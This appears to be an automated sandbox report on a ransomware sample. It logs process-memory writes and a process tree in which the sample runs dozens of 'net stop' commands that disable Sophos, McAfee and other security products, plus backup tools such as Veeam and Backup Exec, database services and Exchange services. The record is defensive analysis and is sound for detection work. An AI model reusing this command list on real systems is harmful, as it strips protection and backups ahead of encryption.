Token: SeRestorePrivilege	4748	vssvc.exe
Token: SeAuditPrivilege	4748	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1916 wrote to memory of 1636	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	29
PID 1916 wrote to memory of 1636	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	29
PID 1916 wrote to memory of 1636	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	29
PID 1916 wrote to memory of 1636	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	29
PID 1636 wrote to memory of 3036	1636	net.exe	31
PID 1636 wrote to memory of 3036	1636	net.exe	31
PID 1636 wrote to memory of 3036	1636	net.exe	31
PID 1636 wrote to memory of 3036	1636	net.exe	31
PID 1916 wrote to memory of 2740	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	32
PID 1916 wrote to memory of 2740	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	32
PID 1916 wrote to memory of 2740	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	32
PID 1916 wrote to memory of 2740	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	32
PID 2740 wrote to memory of 3052	2740	net.exe	34
PID 2740 wrote to memory of 3052	2740	net.exe	34
PID 2740 wrote to memory of 3052	2740	net.exe	34
PID 2740 wrote to memory of 3052	2740	net.exe	34
PID 1916 wrote to memory of 1316	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	35
PID 1916 wrote to memory of 1316	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	35
PID 1916 wrote to memory of 1316	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	35
PID 1916 wrote to memory of 1316	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	35
PID 1316 wrote to memory of 2564	1316	net.exe	37
PID 1316 wrote to memory of 2564	1316	net.exe	37
PID 1316 wrote to memory of 2564	1316	net.exe	37
PID 1316 wrote to memory of 2564	1316	net.exe	37
PID 1916 wrote to memory of 2552	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	38
PID 1916 wrote to memory of 2552	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	38
PID 1916 wrote to memory of 2552	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	38
PID 1916 wrote to memory of 2552	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	38
PID 2552 wrote to memory of 2636	2552	net.exe	40
PID 2552 wrote to memory of 2636	2552	net.exe	40
PID 2552 wrote to memory of 2636	2552	net.exe	40
PID 2552 wrote to memory of 2636	2552	net.exe	40
PID 1916 wrote to memory of 2648	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	41
PID 1916 wrote to memory of 2648	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	41
PID 1916 wrote to memory of 2648	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	41
PID 1916 wrote to memory of 2648	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	41
PID 2648 wrote to memory of 2576	2648	net.exe	43
PID 2648 wrote to memory of 2576	2648	net.exe	43
PID 2648 wrote to memory of 2576	2648	net.exe	43
PID 2648 wrote to memory of 2576	2648	net.exe	43
PID 1916 wrote to memory of 2572	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	44
PID 1916 wrote to memory of 2572	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	44
PID 1916 wrote to memory of 2572	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	44
PID 1916 wrote to memory of 2572	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	44
PID 2572 wrote to memory of 2428	2572	net.exe	46
PID 2572 wrote to memory of 2428	2572	net.exe	46
PID 2572 wrote to memory of 2428	2572	net.exe	46
PID 2572 wrote to memory of 2428	2572	net.exe	46
PID 1916 wrote to memory of 2720	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	47
PID 1916 wrote to memory of 2720	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	47
PID 1916 wrote to memory of 2720	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	47
PID 1916 wrote to memory of 2720	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	47
PID 2720 wrote to memory of 2660	2720	net.exe	49
PID 2720 wrote to memory of 2660	2720	net.exe	49
PID 2720 wrote to memory of 2660	2720	net.exe	49
PID 2720 wrote to memory of 2660	2720	net.exe	49
PID 1916 wrote to memory of 2596	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	50
PID 1916 wrote to memory of 2596	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	50
PID 1916 wrote to memory of 2596	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	50
PID 1916 wrote to memory of 2596	1916	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe	50
PID 2596 wrote to memory of 2640	2596	net.exe	52
PID 2596 wrote to memory of 2640	2596	net.exe	52
PID 2596 wrote to memory of 2640	2596	net.exe	52
PID 2596 wrote to memory of 2640	2596	net.exe	52

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
"C:\Users\Admin\AppData\Local\Temp\3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe"
1⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1916
- C:\Windows\SysWOW64\net.exe
  net stop "Acronis VSS Provider" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
    3⤵
    PID:3036
- C:\Windows\SysWOW64\net.exe
  net stop "Enterprise Client Service" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Enterprise Client Service" /y
    3⤵
    PID:3052
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos Agent" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1316
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos Agent" /y
    3⤵
    PID:2564
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos AutoUpdate Service" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
    3⤵
    PID:2636
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos Clean Service" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos Clean Service" /y
    3⤵
    PID:2576
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos Device Control Service" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
    3⤵
    PID:2428
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos File Scanner Service" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
    3⤵
    PID:2660
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos Health Service" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2596
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos Health Service" /y
    3⤵
    PID:2640
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos MCS Agent" /y
  2⤵
  PID:2420
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
    3⤵
    PID:2440
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos MCS Client" /y
  2⤵
  PID:2464
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos MCS Client" /y
    3⤵
    PID:2088
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos Message Router" /y
  2⤵
  PID:2984
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos Message Router" /y
    3⤵
    PID:2988
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos Safestore Service" /y
  2⤵
  PID:2264
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
    3⤵
    PID:2404
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos System Protection Service" /y
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
    3⤵
    PID:1648
- C:\Windows\SysWOW64\net.exe
  net stop "Sophos Web Control Service" /y
  2⤵
  PID:524
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
    3⤵
    PID:684
- C:\Windows\SysWOW64\net.exe
  net stop "SQLsafe Backup Service" /y
  2⤵
  PID:268
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
    3⤵
    PID:2704
- C:\Windows\SysWOW64\net.exe
  net stop "SQLsafe Filter Service" /y
  2⤵
  PID:2764
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
    3⤵
    PID:1068
- C:\Windows\SysWOW64\net.exe
  net stop "Symantec System Recovery" /y
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Symantec System Recovery" /y
    3⤵
    PID:1112
- C:\Windows\SysWOW64\net.exe
  net stop "Veeam Backup Catalog Data Service" /y
  2⤵
  PID:2700
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
    3⤵
    PID:2040
- C:\Windows\SysWOW64\net.exe
  net stop "AcronisAgent" /y
  2⤵
  PID:1212
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "AcronisAgent" /y
    3⤵
    PID:1928
- C:\Windows\SysWOW64\net.exe
  net stop "AcrSch2Svc" /y
  2⤵
  PID:1868
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "AcrSch2Svc" /y
    3⤵
    PID:2492
- C:\Windows\SysWOW64\net.exe
  net stop "Antivirus" /y
  2⤵
  PID:2712
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "Antivirus" /y
    3⤵
    PID:2800
- C:\Windows\SysWOW64\net.exe
  net stop "ARSM" /y
  2⤵
  PID:2804
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "ARSM" /y
    3⤵
    PID:2788
- C:\Windows\SysWOW64\net.exe
  net stop "BackupExecAgentAccelerator" /y
  2⤵
  PID:516
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "BackupExecAgentAccelerator" /y
    3⤵
    PID:1248
- C:\Windows\SysWOW64\net.exe
  net stop "BackupExecAgentBrowser" /y
  2⤵
  PID:292
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "BackupExecAgentBrowser" /y
    3⤵
    PID:1132
- C:\Windows\SysWOW64\net.exe
  net stop "BackupExecDeviceMediaService" /y
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "BackupExecDeviceMediaService" /y
    3⤵
    PID:800
- C:\Windows\SysWOW64\net.exe
  net stop "BackupExecJobEngine" /y
  2⤵
  PID:960
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "BackupExecJobEngine" /y
    3⤵
    PID:2836
- C:\Windows\SysWOW64\net.exe
  net stop "BackupExecManagementService" /y
  2⤵
  PID:2884
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "BackupExecManagementService" /y
    3⤵
    PID:2832
- C:\Windows\SysWOW64\net.exe
  net stop "BackupExecRPCService" /y
  2⤵
  PID:2840
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "BackupExecRPCService" /y
    3⤵
    PID:2824
- C:\Windows\SysWOW64\net.exe
  net stop "BackupExecVSSProvider" /y
  2⤵
  PID:2968
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "BackupExecVSSProvider" /y
    3⤵
    PID:1672
- C:\Windows\SysWOW64\net.exe
  net stop "bedbg" /y
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "bedbg" /y
    3⤵
    PID:2244
- C:\Windows\SysWOW64\net.exe
  net stop "DCAgent" /y
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "DCAgent" /y
    3⤵
    PID:2252
- C:\Windows\SysWOW64\net.exe
  net stop "EPSecurityService" /y
  2⤵
  PID:2084
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "EPSecurityService" /y
    3⤵
    PID:2280
- C:\Windows\SysWOW64\net.exe
  net stop "EPUpdateService" /y
  2⤵
  PID:2188
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "EPUpdateService" /y
    3⤵
    PID:1296
- C:\Windows\SysWOW64\net.exe
  net stop "EraserSvc11710" /y
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "EraserSvc11710" /y
    3⤵
    PID:1304
- C:\Windows\SysWOW64\net.exe
  net stop "EsgShKernel" /y
  2⤵
  PID:2324
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "EsgShKernel" /y
    3⤵
    PID:1876
- C:\Windows\SysWOW64\net.exe
  net stop "FA_Scheduler" /y
  2⤵
  PID:840
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "FA_Scheduler" /y
    3⤵
    PID:2208
- C:\Windows\SysWOW64\net.exe
  net stop "IISAdmin" /y
  2⤵
  PID:2920
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "IISAdmin" /y
    3⤵
    PID:1532
- C:\Windows\SysWOW64\net.exe
  net stop "IMAP4Svc" /y
  2⤵
  PID:1684
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "IMAP4Svc" /y
    3⤵
    PID:1544
- C:\Windows\SysWOW64\net.exe
  net stop "macmnsvc" /y
  2⤵
  PID:1788
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "macmnsvc" /y
    3⤵
    PID:1980
- C:\Windows\SysWOW64\net.exe
  net stop "masvc" /y
  2⤵
  PID:1168
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "masvc" /y
    3⤵
    PID:1608
- C:\Windows\SysWOW64\net.exe
  net stop "MBAMService" /y
  2⤵
  PID:1728
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MBAMService" /y
    3⤵
    PID:1960
- C:\Windows\SysWOW64\net.exe
  net stop "MBEndpointAgent" /y
  2⤵
  PID:1988
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MBEndpointAgent" /y
    3⤵
    PID:1080
- C:\Windows\SysWOW64\net.exe
  net stop "McAfeeEngineService" /y
  2⤵
  PID:1480
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "McAfeeEngineService" /y
    3⤵
    PID:1892
- C:\Windows\SysWOW64\net.exe
  net stop "McAfeeFramework" /y
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "McAfeeFramework" /y
    3⤵
    PID:2148
- C:\Windows\SysWOW64\net.exe
  net stop "McAfeeFrameworkMcAfeeFramework" /y
  2⤵
  PID:2096
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework" /y
    3⤵
    PID:1992
- C:\Windows\SysWOW64\net.exe
  net stop "McShield" /y
  2⤵
  PID:848
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "McShield" /y
    3⤵
    PID:536
- C:\Windows\SysWOW64\net.exe
  net stop "McTaskManager" /y
  2⤵
  PID:1476
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "McTaskManager" /y
    3⤵
    PID:1568
- C:\Windows\SysWOW64\net.exe
  net stop "mfemms" /y
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "mfemms" /y
    3⤵
    PID:2964
- C:\Windows\SysWOW64\net.exe
  net stop "mfevtp" /y
  2⤵
  PID:1688
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "mfevtp" /y
    3⤵
    PID:2184
- C:\Windows\SysWOW64\net.exe
  net stop "MMS" /y
  2⤵
  PID:2132
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MMS" /y
    3⤵
    PID:1996
- C:\Windows\SysWOW64\net.exe
  net stop "mozyprobackup" /y
  2⤵
  PID:1716
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "mozyprobackup" /y
    3⤵
    PID:2028
- C:\Windows\SysWOW64\net.exe
  net stop "MsDtsServer" /y
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MsDtsServer" /y
    3⤵
    PID:2272
- C:\Windows\SysWOW64\net.exe
  net stop "MsDtsServer100" /y
  2⤵
  PID:2568
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MsDtsServer100" /y
    3⤵
    PID:2628
- C:\Windows\SysWOW64\net.exe
  net stop "MsDtsServer110" /y
  2⤵
  PID:2912
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MsDtsServer110" /y
    3⤵
    PID:2732
- C:\Windows\SysWOW64\net.exe
  net stop "MSExchangeES" /y
  2⤵
  PID:2528
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSExchangeES" /y
    3⤵
    PID:2728
- C:\Windows\SysWOW64\net.exe
  net stop "MSExchangeIS" /y
  2⤵
  PID:2468
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSExchangeIS" /y
    3⤵
    PID:2452
- C:\Windows\SysWOW64\net.exe
  net stop "MSExchangeMGMT" /y
  2⤵
  PID:2416
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSExchangeMGMT" /y
    3⤵
    PID:2980
- C:\Windows\SysWOW64\net.exe
  net stop "MSExchangeMTA" /y
  2⤵
  PID:2480
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSExchangeMTA" /y
    3⤵
    PID:2992
- C:\Windows\SysWOW64\net.exe
  net stop "MSExchangeSA" /y
  2⤵
  PID:2760
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSExchangeSA" /y
    3⤵
    PID:672
- C:\Windows\SysWOW64\net.exe
  net stop "MSExchangeSRS" /y
  2⤵
  PID:2692
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSExchangeSRS" /y
    3⤵
    PID:1072
- C:\Windows\SysWOW64\net.exe
  net stop "MSOLAP$SQL_2008" /y
  2⤵
  PID:2748
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSOLAP$SQL_2008" /y
    3⤵
    PID:2676
- C:\Windows\SysWOW64\net.exe
  net stop "MSOLAP$SYSTEM_BGC" /y
  2⤵
  PID:2668
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC" /y
    3⤵
    PID:1236
- C:\Windows\SysWOW64\net.exe
  net stop "MSOLAP$TPS" /y
  2⤵
  PID:2408
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSOLAP$TPS" /y
    3⤵
    PID:2612
- C:\Windows\SysWOW64\net.exe
  net stop "MSOLAP$TPSAMA" /y
  2⤵
  PID:436
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSOLAP$TPSAMA" /y
    3⤵
    PID:560
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$BKUPEXEC" /y
  2⤵
  PID:2816
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC" /y
    3⤵
    PID:2808
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$ECWDB2" /y
  2⤵
  PID:864
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$ECWDB2" /y
    3⤵
    PID:2872
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$PRACTICEMGT" /y
  2⤵
  PID:2856
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT" /y
    3⤵
    PID:2512
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$PRACTTICEBGC" /y
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC" /y
    3⤵
    PID:1720
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$PROFXENGAGEMENT" /y
  2⤵
  PID:1340
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT" /y
    3⤵
    PID:2880
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$SBSMONITORING" /y
  2⤵
  PID:2176
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING" /y
    3⤵
    PID:2852
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$SHAREPOINT" /y
  2⤵
  PID:2868
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT" /y
    3⤵
    PID:1528
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$SQL_2008" /y
  2⤵
  PID:2908
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$SQL_2008" /y
    3⤵
    PID:1300
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$SYSTEM_BGC" /y
  2⤵
  PID:884
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC" /y
    3⤵
    PID:2236
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$TPS" /y
  2⤵
  PID:1740
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$TPS" /y
    3⤵
    PID:1884
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$TPSAMA" /y
  2⤵
  PID:2156
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$TPSAMA" /y
    3⤵
    PID:1824
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$VEEAMSQL2008R2" /y
  2⤵
  PID:1612
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y
    3⤵
    PID:1944
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQL$VEEAMSQL2012" /y
  2⤵
  PID:908
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012" /y
    3⤵
    PID:2396
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLFDLauncher" /y
  2⤵
  PID:2260
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLFDLauncher" /y
    3⤵
    PID:2504
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y
  2⤵
  PID:2864
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y
    3⤵
    PID:1336
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLFDLauncher$SBSMONITORING" /y
  2⤵
  PID:704
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING" /y
    3⤵
    PID:2308
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLFDLauncher$SHAREPOINT" /y
  2⤵
  PID:1352
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT" /y
    3⤵
    PID:3016
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLFDLauncher$SQL_2008" /y
  2⤵
  PID:3032
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008" /y
    3⤵
    PID:2128
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLFDLauncher$SYSTEM_BGC" /y
  2⤵
  PID:2256
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC" /y
    3⤵
    PID:2112
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLFDLauncher$TPS" /y
  2⤵
  PID:2556
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS" /y
    3⤵
    PID:2588
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLFDLauncher$TPSAMA" /y
  2⤵
  PID:2008
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA" /y
    3⤵
    PID:1364
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLSERVER" /y
  2⤵
  PID:2544
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLSERVER" /y
    3⤵
    PID:3068
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLServerADHelper100" /y
  2⤵
  PID:580
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLServerADHelper100" /y
    3⤵
    PID:1948
- C:\Windows\SysWOW64\net.exe
  net stop "MSSQLServerOLAPService" /y
  2⤵
  PID:1456
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MSSQLServerOLAPService" /y
    3⤵
    PID:1092
- C:\Windows\SysWOW64\net.exe
  net stop "MySQL80" /y
  2⤵
  PID:1096
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MySQL80" /y
    3⤵
    PID:1332
- C:\Windows\SysWOW64\net.exe
  net stop "MySQL57" /y
  2⤵
  PID:1372
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "MySQL57" /y
    3⤵
    PID:896
- C:\Windows\SysWOW64\net.exe
  net stop "ntrtscan" /y
  2⤵
  PID:1704
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "ntrtscan" /y
    3⤵
    PID:2844
- C:\Windows\SysWOW64\net.exe
  net stop "OracleClientCache80" /y
  2⤵
  PID:2072
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "OracleClientCache80" /y
    3⤵
    PID:2172
- C:\Windows\SysWOW64\net.exe
  net stop "PDVFSService" /y
  2⤵
  PID:964
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "PDVFSService" /y
    3⤵
    PID:2928
- C:\Windows\SysWOW64\net.exe
  net stop "POP3Svc" /y
  2⤵
  PID:1128
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "POP3Svc" /y
    3⤵
    PID:112
- C:\Windows\SysWOW64\net.exe
  net stop "ReportServer" /y
  2⤵
  PID:2060
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "ReportServer" /y
    3⤵
    PID:2316
- C:\Windows\SysWOW64\net.exe
  net stop "ReportServer$SQL_2008" /y
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "ReportServer$SQL_2008" /y
    3⤵
    PID:1076
- C:\Windows\SysWOW64\net.exe
  net stop "ReportServer$SYSTEM_BGC" /y
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC" /y
    3⤵
    PID:2004
- C:\Windows\SysWOW64\net.exe
  net stop "ReportServer$TPS" /y
  2⤵
  PID:2388
- - C:\Windows\SysWOW64\net1.exe
